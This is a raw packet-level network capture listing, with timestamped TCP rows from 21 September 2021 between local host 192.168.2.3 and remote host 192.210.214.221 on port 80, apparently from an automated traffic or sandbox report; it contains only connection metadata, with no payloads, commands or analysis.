Sep 21, 2021 21:34:34.795377970 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.795397043 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.795408964 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.795578957 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.804157972 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.804236889 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.804282904 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.804326057 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.804363012 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.804403067 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.804426908 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.804441929 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.804446936 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.804482937 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.804522038 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.804522991 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.804563999 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.804608107 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.804646015 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.804651022 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.804683924 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.804703951 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.804723978 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.804760933 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.804799080 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.804820061 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.804837942 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.804842949 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.804877996 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.804915905 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.804917097 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.804979086 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.805066109 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.805114031 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.805147886 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.805325031 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.805574894 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.838615894 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.838738918 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.838758945 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.838824034 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.838864088 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.838917971 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.838984966 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.839004040 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.839020967 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.839040041 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.839046955 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.839061022 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.839077950 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.839090109 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.839097977 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.839126110 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.855215073 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.943428993 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.943464041 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.943478107 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.943500042 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.943519115 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.943540096 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.943547010 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.943562031 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.943583012 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.943599939 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.943605900 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.943623066 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.943644047 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.943659067 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.943670034 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.943690062 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.943707943 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.943710089 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.943727970 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.943733931 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.943746090 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.943758011 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.943763971 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.943783045 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.943800926 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.943804979 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.943825960 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.943845034 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.943862915 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.943864107 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.943881989 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.943893909 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.943907022 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.943916082 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.943924904 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.943943024 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.943959951 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.943979025 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.943984985 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.943995953 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.944013119 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.944017887 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.944032907 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.944037914 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.944055080 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.944072008 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.944082975 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.944089890 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.944114923 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.944122076 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.944143057 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.944164991 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.944185019 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.944185972 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.944207907 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.944226980 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.944231033 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.944250107 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.944253922 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.944276094 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.944298029 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.944298983 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.944318056 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.944334984 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.944341898 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.944354057 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.944370985 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.944374084 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.944392920 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.944411993 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.944430113 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.944432020 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.944449902 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.944467068 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.944469929 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.944483995 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.944504023 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.944504023 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.944523096 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.944539070 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.944542885 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.944555998 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.944571018 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.944602966 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.951014996 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.954019070 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.954052925 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.954071999 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.954092026 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.954112053 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.954155922 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.954286098 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.954339027 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.954344988 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.954358101 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.954376936 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.954395056 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.954410076 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.954412937 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.954431057 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.954451084 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.954452038 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.954473019 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.954480886 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.954492092 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.954513073 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.954530001 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.954535007 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.954560041 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.954576015 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.954582930 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.954593897 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.954610109 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.954612017 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.954633951 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.954642057 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.954653978 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.954670906 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.954687119 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.954688072 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.954705000 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.954721928 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.954731941 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.954756021 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.954782963 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.954829931 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.954885960 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.954996109 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.955014944 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:34.955049992 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:34.979382038 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.002975941 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.003012896 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.003036022 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.003057003 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.003129005 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.003186941 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.003236055 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.003257990 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.003278971 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.003307104 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.003317118 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.003317118 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.003335953 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.003356934 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.003377914 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.003397942 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.003462076 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.048280001 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.092519045 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.092549086 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.092561007 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.092572927 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.092590094 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.092601061 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.092617035 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.092628002 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.092638969 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.092643976 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.092660904 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.092679024 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.092679977 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.092696905 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.092706919 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.092713118 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.092729092 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.092745066 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.092760086 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.092761040 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.092776060 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.092789888 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.092791080 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.092809916 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.092817068 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.092828989 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.092842102 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.092844009 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.092859983 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.092869997 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.092875957 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.092890978 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.092906952 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.092911959 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.092921972 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.092928886 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.092941046 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.092957973 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.092972994 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.092983007 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.092988968 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093004942 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093013048 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.093019962 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093035936 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093038082 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.093050957 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093070030 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093070030 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.093086958 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093101978 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093113899 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.093117952 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093131065 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.093133926 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093149900 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093161106 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.093164921 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093180895 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093194962 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.093199015 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093216896 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093224049 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.093233109 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093249083 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093264103 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093270063 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.093278885 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093295097 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093307972 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.093311071 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093331099 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093332052 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.093348980 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093360901 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.093364954 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093380928 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093395948 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.093396902 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093411922 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093425035 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.093429089 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093445063 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093462944 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093473911 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.093480110 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093494892 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093502045 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.093511105 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093527079 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093528032 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.093542099 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093558073 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093559027 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.093574047 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093592882 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.093594074 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093611002 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093619108 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.093626022 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093642950 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093648911 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.093657970 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093673944 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093689919 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093697071 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.093704939 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093724966 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093732119 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.093744993 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093753099 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.093760967 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093777895 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093789101 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.093794107 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093810081 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093817949 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.093826056 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093841076 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093848944 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.093859911 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093877077 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093892097 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093894958 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.093907118 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093921900 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.093923092 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093938112 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.093951941 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.093954086 CEST	80	49742	192.210.214.221	192.168.2.3
